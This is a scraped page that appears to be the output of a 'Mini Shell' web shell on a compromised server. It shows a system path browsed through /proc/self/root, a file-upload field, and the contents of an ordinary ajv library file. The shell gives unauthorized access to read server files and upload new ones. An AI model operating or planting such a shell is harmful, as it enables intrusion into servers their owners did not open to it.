HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/ajv/lib/dotjs/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/ajv/lib/dotjs/comment.js
'use strict';
module.exports = function generate_comment(it, $keyword, $ruleType) {
var out=' ';   var $schema = it.schema[$keyword];  var $errSchemaPath = it.errSchemaPath + '/' + $keyword; var $breakOnError = !it.opts.allErrors;      var $comment = it.util.toQuotedString($schema); if(it.opts.$comment === true){out+=' console.log('+($comment)+');';}else if(typeof it.opts.$comment == 'function'){out+=' self._opts.$comment('+($comment)+', '+(it.util.toQuotedString($errSchemaPath))+', validate.root.schema);';}return out;
}